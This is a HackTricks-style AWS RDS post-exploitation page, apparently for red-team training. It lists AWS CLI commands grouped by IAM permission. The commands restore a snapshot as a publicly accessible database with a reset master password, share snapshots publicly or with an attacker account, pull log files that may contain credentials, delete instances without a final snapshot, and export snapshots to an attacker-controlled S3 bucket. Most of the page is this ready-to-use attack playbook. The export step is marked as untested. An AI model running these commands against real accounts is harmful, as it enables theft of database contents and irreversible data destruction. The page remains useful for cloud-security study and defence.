6.1 KiB
AWS - RDS Post Exploitation
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
RDS
For more information check:
{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} aws-relational-database-rds-enum.md {% endcontent-ref %}
rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance
If the attacker has enough permissions, he could make a DB publicly accessible by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.
aws rds describe-db-instances # Get DB identifier
aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat
# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>
aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately
# Connect to the new DB after a few mins
rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot
An attacker with these permissions could create an snapshot of a DB and make it publicly available. Then, he could just create in his own account a DB from that snapshot.
If the attacker doesn't have the rds:CreateDBSnapshot, he still could make other created snapshots public.
{% code overflow="wrap" %}
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
{% endcode %}
rds:DownloadDBLogFilePortion
An attacker with the rds:DownloadDBLogFilePortion permission can download portions of an RDS instance's log files. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
{% code overflow="wrap" %}
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
{% endcode %}
Potential Impact: Access to sensitive information or unauthorized actions using leaked credentials.
rds:DeleteDBInstance
An attacker with these permissions can DoS existing RDS instances.
{% code overflow="wrap" %}
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
{% endcode %}
Potential impact: Deletion of existing RDS instances, and potential loss of data.
rds:StartExportTask
{% hint style="info" %} TODO: Test {% endhint %}
An attacker with this permission can export an RDS instance snapshot to an S3 bucket. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.
{% code overflow="wrap" %}
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
{% endcode %}
Potential impact: Access to sensitive data in the exported snapshot.
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.